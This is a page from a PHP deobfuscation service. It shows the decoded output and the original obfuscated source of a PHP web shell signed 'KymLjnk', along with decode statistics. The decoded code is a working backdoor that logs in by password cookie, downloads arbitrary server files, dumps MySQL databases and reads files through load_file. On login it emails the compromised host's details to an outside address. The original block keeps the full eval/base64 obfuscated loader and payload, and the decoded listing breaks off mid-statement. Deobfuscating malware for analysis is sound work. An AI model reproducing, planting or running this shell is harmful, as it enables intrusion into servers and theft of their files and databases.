Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* xxx.php Shell Version 3 By KymLjnk */$OOO000000=urldecode('%66%67%36%73%62%65%68%..

Decoded Output download


error_reporting(7);
@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ',microtime());
$starttime = $mtime[1] +$mtime[0];
define('SA_ROOT',str_replace('\','/',dirname('index.php')).'/');
define('IS_WIN',DIRECTORY_SEPARATOR == '\');
define('IS_COM',class_exists('COM') ?1 : 0 );
define('IS_GPC',get_magic_quotes_gpc());
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO',(!eregi("phpinfo",$dis_func)) ?1 : 0 );
@set_time_limit(0);
foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key =>$_value) {
if ($_key{0}!= '_') {
if (IS_GPC) {
$_value = s_array($_value);
}
$$_key = $_value;
}
}
}
$admin = array();
$admin['check'] = true;
$admin['pass']  = 'xxx';
$admin['cookiepre'] = '';
$admin['cookiedomain'] = '';
$admin['cookiepath'] = '/';
$admin['cookielife'] = 86400;
if ($charset == 'utf8') {
header("content-Type: text/html; charset=utf-8");
}elseif ($charset == 'big5') {
header("content-Type: text/html; charset=big5");
}elseif ($charset == 'gbk') {
header("content-Type: text/html; charset=gbk");
}elseif ($charset == 'latin1') {
header("content-Type: text/html; charset=iso-8859-2");
}
$self = $_SERVER['PHP_SELF'] ?$_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();
if ($action == "logout") {
scookie('kymljnk','',-86400 * 365);
p('<meta http-equiv="refresh" content="0;URL='.$self.'">');
p('<body background=black>');
exit;
}
if($admin['check']) {
if ($doing == 'login') {
if ($admin['pass'] == $password) {
scookie('kymljnk',$password);
$time_shell = "".date("d/m/Y - H:i:s")."";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = '[email protected]';
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";
$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode
Reply-to: $from_shellcode";
@mail($to_email,$server_mail,$linkcr,$header);
p('<meta http-equiv="refresh" content="2;URL='.$self.'">');
p('<body bgcolor=black>
<BR><BR><div align=center><font color=yellow face=tahoma size=2>Loading<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>');
exit;
}
else
{
$err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
echo $err_mess;
}}
if ($_COOKIE['kymljnk']) {
if ($_COOKIE['kymljnk'] != $admin['pass']) {
loginpage();
}
}else {
loginpage();
}
}
$errmsg = '';
if ($action == 'phpinfo') {
if (IS_PHPINFO) {
phpinfo();
}else {
$errmsg = 'phpinfo() function has non-permissible';
}
}
if ($doing == 'downfile'&&$thefile) {
if (!@file_exists($thefile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
}else {
$fileinfo = pathinfo($thefile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header('Content-Length: '.filesize($thefile));
@readfile($thefile);
exit;
}
}
if ($doing == 'backupmysql'&&!$saveasfile) {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
$table = array_flip($table);
$result = q("SHOW tables");
if (!$result) p('<h2>'.mysql_error().'</h2>');
$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata .= sqldumptable($currow[0]);
}
}
mysql_close();
exit;
}
if($doing=='mysqldown'){
if (!$dbname) {
$errmsg = ' dbname';
}else {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
if (!file_exists($mysqldlfile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
}else {
$result = q("select load_file('$mysqldlfile');");
if(!$result){
q("DROP TABLE IF EXISTS tmp_angel;");
q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO

Did this file decode correctly?

Original Code

<?php /* xxx.php Shell Version 3 By KymLjnk */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x97de0;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDUzNik7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnTEo4VG5hdUVDMHB3ZXhoNGxRYjF0QVhqcktvVU0ySDc5RzZkU2dPK3pxY0YvZml5Qk5WWjVzUllJa0RQbTN2Vz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>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

Function Calls

fopen 1
fread 3
strtr 2
fclose 1
urldecode 1
str_replace 1
base64_decode 3

Variables

$O000O0O00 True
$O0O000O00 fgets
$O0O00OO00 fread
$OO00O0000 622048
$OO00O00O0 error_reporting(7); @set_magic_quotes_runtime(0); ob_sta..
$OOO000000 fg6sbehpra4co_tnd
$OOO00000O strtr
$OOO0000O0 base64_decode
$OOO000O00 fopen
$OOO0O0O00 index.php

Stats

MD5 2832187c03c1005db08b1337ef9c8c56
Eval Count 3
Decode Time 149 ms